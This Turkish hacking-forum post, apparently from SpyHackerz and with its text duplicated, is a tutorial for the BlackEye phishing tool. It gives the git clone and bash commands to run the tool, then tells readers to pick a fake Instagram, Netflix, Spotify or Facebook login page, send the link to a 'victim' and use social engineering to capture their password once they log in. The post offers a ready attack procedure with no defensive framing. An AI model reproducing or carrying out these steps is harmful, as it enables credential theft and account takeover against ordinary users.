( Bu tool ile instagram netflix spotify facebook gibi platformların fake scrptini açarak soyal mühendislik ile kullanıcı şifreleri kırabileceksiniz)
/..TOOLU AÇMAK İÇİN TERMUX DA KULLANABİLİRSİNİZ../
YORUM YAPIP BEĞENİRSENİZ KONUYU GÖREBİLİRSİNİZ
Kullanacağımız tool: BlackEye
KODLAR;
$_ git clone https://github.com/An0nUD4Y/blackeye.git (bu komut ile toolu terminalimize yükleyelim)
$_ls (bu komutla toolun gelip gelmediğini kontrol ediyoruz)
$_cd blackeye (bu komutla ise toolun içine giriyoruz)
$_bash blackeye.sh (ve son olarak toolu çalıştıralım)
'
ÇIKAN EKRANDA SİZE HANGİ SİTESİNİN FAKE SCPRİTİ LAZIMSA BAŞINDAKİ NUMARAYI YAZIP SİTENİZİ AÇABİLİRSİNİZ.
bilmeyen arkadaşlarım varsa platformu seçtikten sonra sitenin size verdiği linki kopyalayıp kurbana atacaksınız ve sosyal mühendislikle giriş yapmasını sağlayacaksınız kurban giriş yapınca şifreyi alacaksınız..😈
(RESİM TEMSİLİ YANDAKİ HAYALET YOK AMA KALANI AYNI)
Linux kullananlar "$_cd Desktop" komutunu kullanabilirler ben termux kullananların kafası karışır diye koymadım..
BOL ŞANS

/..TOOLU AÇMAK İÇİN TERMUX DA KULLANABİLİRSİNİZ../
YORUM YAPIP BEĞENİRSENİZ KONUYU GÖREBİLİRSİNİZ
Kullanacağımız tool: BlackEye
KODLAR;
$_ git clone https://github.com/An0nUD4Y/blackeye.git (bu komut ile toolu terminalimize yükleyelim)
$_ls (bu komutla toolun gelip gelmediğini kontrol ediyoruz)
$_cd blackeye (bu komutla ise toolun içine giriyoruz)
$_bash blackeye.sh (ve son olarak toolu çalıştıralım)
'

ÇIKAN EKRANDA SİZE HANGİ SİTESİNİN FAKE SCPRİTİ LAZIMSA BAŞINDAKİ NUMARAYI YAZIP SİTENİZİ AÇABİLİRSİNİZ.
bilmeyen arkadaşlarım varsa platformu seçtikten sonra sitenin size verdiği linki kopyalayıp kurbana atacaksınız ve sosyal mühendislikle giriş yapmasını sağlayacaksınız kurban giriş yapınca şifreyi alacaksınız..😈
(RESİM TEMSİLİ YANDAKİ HAYALET YOK AMA KALANI AYNI)
Linux kullananlar "$_cd Desktop" komutunu kullanabilirler ben termux kullananların kafası karışır diye koymadım..
BOL ŞANS

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl